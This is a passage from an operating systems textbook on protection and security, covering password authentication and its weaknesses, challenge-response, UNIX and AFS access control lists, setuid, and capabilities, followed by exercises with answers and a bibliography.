password every time they wanted to open a file would inspire all sorts of ingenious ways
to avoid the protection mechanism altogether.

Minimum Privilege. This is an extension of point 2. A person (or program or process)
should be given just enough powers to get the job done. In other contexts, this principle is
called ``need to know.'' It implies that the protection mechanism has to support finegrained control.

Simple, Uniform Mechanisms. Any piece of software should be as simple as possible
(but no simpler!) to maximize the chances that it is correctly and efficiently implemented.
133
This is particularly important for protection software, since bugs are likely be usable as
security loopholes. It is also important that the interface to the protection mechanisms be
simple, easy to understand, and easy to use. It is remarkably hard to design good,
foolproof security policies; policy designers need all the help they can get.

Appropriate Levels of Security. You don't store your best silverware in a box on the front
lawn, but you also don't keep it in a vault at the bank. The US Strategic Air Defense calls
for a different level of security than my records of the grades for this course. Not only
does excessive security mechanism add unnecessary cost and performance degradation, it
can actually lead to a less secure system. If the protection mechanisms are too hard to
use, users will go out of their way to avoid using them.
Authentication
Authentication is a process by which one party convinces another of its identity. A familiar
instance is the login process, though which a human user convinces the computer system that he
has the right to use a particular account. If the login is successful, the system creates a process
and associates with it the internal identifier that identifies the account. Authentication occurs in
other contexts, and it isn't always a human being that is being authenticated. Sometimes a
process needs to authenticate itself to another process. In a networking environment, a computer
may need to authenticate itself to another computer. In general, let's call the party that whats to
be authenticated the client and the other party the server.
One common technique for authentication is the use of a password. This is the technique used
most often for login. There is a value, called the password that is known to both the server and to
legitimate clients. The client tells the server who he claims to be and supplies the password as
proof. The server compares the supplied password with what he knows to be the true password
for that user.
Although this is a common technique, it is not a very good one. There are lots of things wrong
with it.
Direct attacks on the password.
The most obvious way of breaking in is a frontal assault on the password. Simply try all possible
passwords until one works. The main defense against this attack is the time it takes to try lots of
possibilities. If the client is a computer program (perhaps masquerading as a human being), it can
134
try lots of combinations very quickly, but by if the password is long enough, even the fastest
computer cannot try succeed in a reasonable amount of time. If the password is a string of 8
letters and digits, there are 2,821,109,907,456 possibilities. A program that tried one combination
every millisecond would take 89 years to get through them all. If users are allowed to pick their
own passwords, they are likely to choose ``cute doggie names'', common words, names of family
members, etc. That cuts down the search space considerably. A password cracker can go through
dictionaries, lists of common names, etc. It can also use biographical information about the user
to narrow the search space. There are several defenses against this sort of attack.

The system chooses the password. The problem with this is that the password will not be
easy to remember, so the user will be tempted to write it down or store it in a file, making
it easy to steal. This is not a problem if the client is not a human being.

The system rejects passwords that are too ``easy to guess''. In effect, it runs a password
cracker when the user tries to set his password and rejects the password if the cracker
succeeds. This has many of the disadvantages of the previous point. Besides, it leads to a
sort of arms race between crackers and checkers.

The password check is artificially slowed down, so that it takes longer to go through lots
of possibilities. One variant of this idea is to hang up a dial-in connection after three
unsuccessful login attempts, forcing the bad guy to take the time to redial.
Eavesdropping.
This is a far bigger program for passwords than brute force attacks. In comes in many disguises.

Looking over someone's shoulder while he's typing his password. Most systems turn off
echoing, or echo each character as an asterisk to mitigate this problem.

Reading the password file. In order to verify that the password is correct, the server has to
have it stored somewhere. If the bad guy can somehow get access to this file, he can pose
as anybody. While this isn't a threat on its own (after all, why should the bad guy have
access to the password file in the first place?), it can magnify the effects of an existing
security lapse.
UNIX introduced a clever fix to this problem, that has since been almost universally
copied. Use some hash function f and instead of storing password, store f(password). The
hash function should have two properties: Like any hash function it should generate all
135
possible result values with roughly equal probability, and in addition, it should be very
hard to invert--that is, given f(password), it should be hard to recover password. It is quite
easy to devise functions with these properties. When a client sends his password, the
server applies f to it and compares the result with the value stored in the password file.
Since only f(password) is stored in the password file, nobody can find out the password
for a given user, even with full access to the password file, and logging in requires
knowing password, not f(password). In fact, this technique is so secure, it has become
customary to make the password file publicly readable!

Wire tapping. If the bad guy can somehow intercept the information sent from the client
to the server, password-based authentication breaks down altogether. It is increasingly the
case the authentication occurs over an insecure channel such as a dial-up line or a localarea network. Note that the UNIX scheme of storing f(password) is of no help here, since
the password is sent in its original form (``plaintext'' in the jargon of encryption) from the
client to the server. We will consider this problem in more detail below.
Spoofing.
This is the worst threat of all. How does the client know that the server is who it appears to be? If
the bad guy can pose as the server, he can trick the client into divulging his password. We saw a
form of this attack above. It would seem that the server needs to authenticate itself to the client
before the client can authenticate itself to the server. Clearly, there's a chicken-and-egg problem
here. Fortunately, there's a very clever and general solution to this problem.
Challenge-response.
There are wide variety of authentication protocols, but they are all based on a simple idea. As
before, we assume that there is a password known to both the (true) client and the (true) server.
Authentication is a four-step process.

The client sends a message to the server saying who he claims to be and requesting
authentication.

The server sends a challenge to the client consisting of some random value x.

The client computes g(password,x) and sends it back as the response. Here g is a hash
function similar to the function f above, except that it has two arguments. It should have
136
the property that it is essentially impossible to figure out password even if you know both
x and g(password,x).

The server also computes g(password,x) and compares it with the response it got from the
client.
Clearly this algorithm works if both the client and server are legitimate. An eavesdropper could
learn the user's name, x and g(password,x), but that wouldn't help him pose as the user. If he
tried to authenticate himself to the server he would get a different challenge x', and would have
no way to respond. Even a bogus server is no threat. The change provides him with no useful
information. Similarly, a bogus client does no harm to a legitimate server except for tying him up
in a useless exchange (a denial-of-service problem!).
Protection Mechanisms
Before looking at the protection mechanisms, let’s have a look at some terminologies:
objects
The things to which we wish to control access. They include physical (hardware) objects
as well as software objects such as files, databases, semaphores, or processes. As in
object-oriented programming, each object has a type and supports certain operations as
defined by its type. In simple protection systems, the set of operations is quite limited:
read, write, and perhaps execute, append, and a few others. Fancier protection systems
support a wider variety of types and operations, perhaps allowing new types and
operations to be dynamically defined.
principals
Intuitively, ``users''--the ones who do things to objects. Principals might be individual
persons, groups or projects, or roles, such as ``administrator.'' Often each process is
associated with a particular principal, the owner of the process.
rights
Permissions to invoke operations. Each right is the permission for a particular principal to
perform a particular operation on a particular object. For example, principal solomon
might have read rights for a particular file object.
domains
137
Sets of rights. Domains may overlap. Domains are a form of indirection, making it easier
to make wholesale changes to the access environment of a process. There may be three
levels of indirection: A principal owns a particular process, which is in a particular
domain, which contains a set of rights, such as the right to modify a particular file.
Conceptually, the protection state of a system is defined by an access matrix. The rows
correspond to principals (or domains), the columns correspond to objects, and each cell is a set of
rights. For example, if access[solomon]["/tmp/foo"] = { read, write }then we have read and write access
to file "/tmp/foo". We say ``conceptually'' because the access is never actually stored anywhere.
It is very large and has a great deal of redundancy (for example, my rights to a vast number of
objects are exactly the same: none!), so there are much more compact ways to represent it. The
access information is represented in one of two ways, by columns, which are called access
control lists (ACLs), and by rows, called capability lists.
8.2 Access Control Lists
An ACL (pronounced ``ackle'') is a list of rights associated with an object. A good example of
the use of ACLs is the Andrew File System (AFS) originally created at Carnegie-Mellon
University and now marketed by Transarc Corporation as an add-on to UNIX. This file system is
widely used in the Computer Sciences Department. Your home directory is in AFS. AFS
associates an ACL with each directory, but the ACL also defines the rights for all the files in the
directory (in effect, they all share the same ACL). You can list the ACL of a directory with the fs
listacl command:
% fs listacl /u/c/s/cs537-1/public
Access list for /u/c/s/cs537-1/public is
Normal rights:
system:administrators rlidwka
system:anyuser rl
solomon rlidwka
The entry system:anyuser rl means that the principal system:anyuser (which represents the role
``anybody at all'') has rights r (read files in the directory) and l (list the files in the directory and
read their attributes). The entry solomon rlidwka means that we have all seven rights supported
by AFS. In addition to r and l, they include the rights to insert new file in the the directory (i.e.,
create files), delete files, write files, lock files, and administer the ACL list itself. This last right
is very powerful: It allows me to add, delete, or modify ACL entries. We thus have the power to
grant or deny any rights to this directory to anybody. The remaining entry in the list shows that
the principal system administrators has the same rights we do namely, all rights. This principal is
138
the name of a group of other principals. The command pts membership system administrators list
the members of the group.
Ordinary UNIX also uses an ACL scheme to control access to files, but in a much stripped-down
form. Each process is associated with a user identifier (uid) and a group identifier (gid), each of
which is a 16-bit unsigned integer. The inode of each file also contains a uid and a gid, as well as
a nine-bit protection mask, called the mode of the file. The mask is composed of three groups of
three bits. The first group indicates the rights of the owner: one bit each for read access, write
access, and execute access (the right to run the file as a program). The second group similarly
lists the rights of the file's group, and the remaining three three bits indicate the rights of
everybody else. For example, the mode 111 101 101 (0755 in octal) means that the owner can
read, write, and execute the file, while members of the owning group and others can read and
execute, but not write the file. Programs that print the mode usually use the characters rwxrather than 0 and 1. Each zero in the binary value is represented by a dash, and each 1 is
represented by r, w, or x, depending on its position. For example, the mode 111101101 is printed
as rwxr-xr-x.
In somewhat more detail, the access-checking algorithm is as follows: The first three bits are
checked to determine whether an operation is allowed if the uid of the file matches the uid of the
process trying to access it. Otherwise, if the gid of the file matches the gid of the process, the
second three bits are checked. If neither of the id's match, the last three bits are used. The code
might look something like this.
boolean accessOK(Process p, Inode i, int operation) {
int mode;
if (p.uid == i.uid)
mode = i.mode >> 6;
else if (p.gid == i.gid)
mode = i.mode >> 3;
else mode = i.mode;
switch (operation) {
case READ: mode &= 4; break;
case WRITE: mode &= 2; break;
case EXECUTE: mode &= 1; break;
}
return (mode != 0);
}
(The expression i.mode >> 3 denotes the value i.mode shifted right by three bits positions and
the operation mode &= 4 clears all but the third bit from the right of mode.) Note that this
scheme can actually give a random user more powers over the file than its owner. For example,
139
the mode ---r--rw- (000 100 110 in binary) means that the owner cannot access the file at all,
while members of the group can only read the file, and other can both read and write. On the
other hand, the owner of the file (and only the owner) can execute the chmod system call, which
changes the mode bits to any desired value. When a new file is created, it gets the uid and gid of
the process that created it, and a mode supplied as an argument to the creat system call.
Most modern versions of UNIX actually implement a slightly more flexible scheme for groups.
A process has a set of gid's, and the check to see whether the file is in the process' group checks
to see whether any of the process' gid's match the file's gid.
boolean accessOK(Process p, Inode i, int operation) {
int mode;
if (p.uid == i.uid)
mode = i.mode >> 6;
else if (p.gidSet.contains(i.gid))
mode = i.mode >> 3;
else mode = i.mode;
switch (operation) {
case READ: mode &= 4; break;
case WRITE: mode &= 2; break;
case EXECUTE: mode &= 1; break;
}
return (mode != 0);
}
When a new file is created, it gets the uid of the process that created it and the gid of the
containing directory. There are system calls to change the uid or gid of a file. For obvious
security reasons, these operations are highly restricted. Some versions of UNIX only allow the
owner of the file to change it gid, only allow him to change it to one of his gid's, and don't allow
him to change the uid at all.
For directories, ``execute'' permission is interpreted as the right to get the attributes of files in the
directory. Write permission is required to create or delete files in the directory. This rule leads to
the surprising result that you might not have permission to modify a file, yet be able to delete it
and replace it with another file of the same name but with different contents!
UNIX has another very clever feature--so clever that it is patented! The file mode actually has a
few more bits that we have not mentioned. One of them is the so-called setuid bit. If a process
executes a program stored in a file with the setuid bit set, the uid of the process is set equal to the
uid of the file. This rather curious rule turns out to be a very powerful feature, allowing the
simple rwx permissions directly supported by UNIX to be used to define arbitrarily complicated
protection policies.
140
As an example, suppose you wanted to implement a mail system that works by putting all mail
messages in to one big file, say /usr/spool/mbox. We should be able to read only those message
that mention me in the To: or Cc: fields of the header. Here's how to use the setuid feature to
implement this policy. Define a new uid mail, make it the owner of /usr/spool/mbox, and set the
mode of the file to rw------- (i.e., the owner mail can read and write the file, but nobody else has
any access to it). Write a program for reading mail, say /usr/bin/readmail. This file is also owned
by mail and has mode srwxr-xr-x. The `s' means that the setuid bit is set. My process can execute
this program (because the ``execute by anybody'' bit is on), and when it does, it suddenly
changes its uid to mail so that it has complete access to /usr/spool/mbox. At first glance, it would
seem that letting my process pretend to be owned by another user would be a big security hole,
but it isn't, because processes don't have free will. They can only do what the program tells them
to do. While my process is running readmail, it is following instructions written by the designer
of the mail system, so it is safe to let it have access appropriate to the mail system. There's one
more feature that helps readmail do its job. A process really has two uid's, called the effective uid
and the real uid. When a process executes a setuid program, its effective uid changes to the uid
of the program, but its real uid remains unchanged. It is the effective uid that is used to determine
what rights it has to what files, but there is a system call to find out the real uid of the current
process. Readmail can use this system call to find out what user called it, and then only show the
appropriate messages.
Capabilities
An alternative to ACLs are capabilities. A capability is a ``protected pointer'' to an object. It
designates an object and also contains a set of permitted operations on the object. For example,
one capability may permit reading from a particular file, while another allows both reading and
writing. To perform an operation on an object, a process makes a system call, presenting a
capability that points to the object and permits the desired operation. For capabilities to work as a
protection mechanism, the system has to ensure that processes cannot mess with their contents.
There are three distinct ways to ensure the integrity of a capability.
Tagged architecture. Some computers associate a tag bit with each word of memory, marking
the word as a capability word or a data word. The hardware checks that capability words are
only assigned from other capability words. To create or modify a capability, a process has to
make a kernel call.
141
Separate capability segments. If the hardware does not support tagging individual words, the OS
can protect capabilities by putting them in a separate segment and using the protection features
that control access to segments.
8.3 Cryptography
Each capability can be extended with a cryptographic checksum that is computed from the rest of
the content of the capability and a secret key. If a process modifies a capability it cannot modify
the checksum to match without access to the key. Only the kernel knows the key. Each time a
process presents a capability to the kernel to invoke an operation; the kernel checks the
checksum to make sure the capability hasn't been tampered with.
Capabilities, like segments are a ``good idea'' that somehow seldom seems to be implemented in
real systems in full generality. Like segments, capabilities show up in an abbreviated form in
many systems. For example, the file descriptor for an open file in UNIX is a kind of capability.
When a process tries to open a file for writing, the system checks the file's ACL to see whether
the access is permitted. If it is, the process gets a file descriptor for the open file, which is a sort
of capability to the file that permits write operations. UNIX uses the separate segment approach
to protect the capability. The capability itself is stored in a table in the kernel and the process has
only an indirect reference to it (the index of the slot in the table). File descriptors are not fullfledged capabilities, however. For example, they cannot be stored in files, because they go away
when the process terminates.
142
8.4 Exercises
1. What are the main differences between capability lists and access lists?
Answer:
An access list is a list for each object consisting of the domains with a nonempty set of access
rights for that object. A capability list is a list of objects and the operations allowed on those objects for
each domain.
2. What protection problems may arise if a shared stack is used for parameter passing?
Answer:
The contents of the stack could be compromised by other process (s) sharing the stack.
3. Consider a computing environment where a unique number is associated with each process
and each object in the system. Suppose that we allow a process with number n to access an
object with number m only if n > m. What type of protection structure do we have?
Answer:
We have hierarchical structure.
4. Consider a computing environment where a process is given the privilege of accessing an
object for only n times. Suggest a scheme for implementing this policy.
Answer:
Add an integer counter with the capability.
5. Why is it difficult to protect a system in which users are allowed to do their own I/O?
Answer:
In earlier chapters we identified a distinction between kernel and user mode where kernel
mode is used for carrying out privileged operations such as I/O. One reason why I/O must be
performed in kernel mode is that I/O requires accessing the hardware and proper access to
the hardware is necessary for system integrity. If we allow users to perform their own I/O, we
cannot guarantee system integrity.
6. Capability lists are usually kept within the address space of the user. How does the system
ensure that the user cannot modify the contents of the list?
Answer:
143
A capability list is considered a “protected object” and is accessed only indirectly by the user.
The operating system ensures the user cannot access the capability list directly.
144
Bibliography
1. Andrew S. Tannenbaum, “Modern Operating Systems”, 2nd Edition, Prentice Hall
2. Avi Silberschatz, Peter Baer Galvin, & Greg Gagne, „Operating System Concepts”,
Seventh Edition
3. E.W. Dijkstra, Dijkstra Algorithm, 1965
4. Haberman, Execution Complexity, 1969
5. Silberschatz & Galvin , “Operating Systems Concepts”, 6th Edition, Addison-Wesley
6. William Stallings, “Operating Systems”, 4th Edition, Prentice Hall
145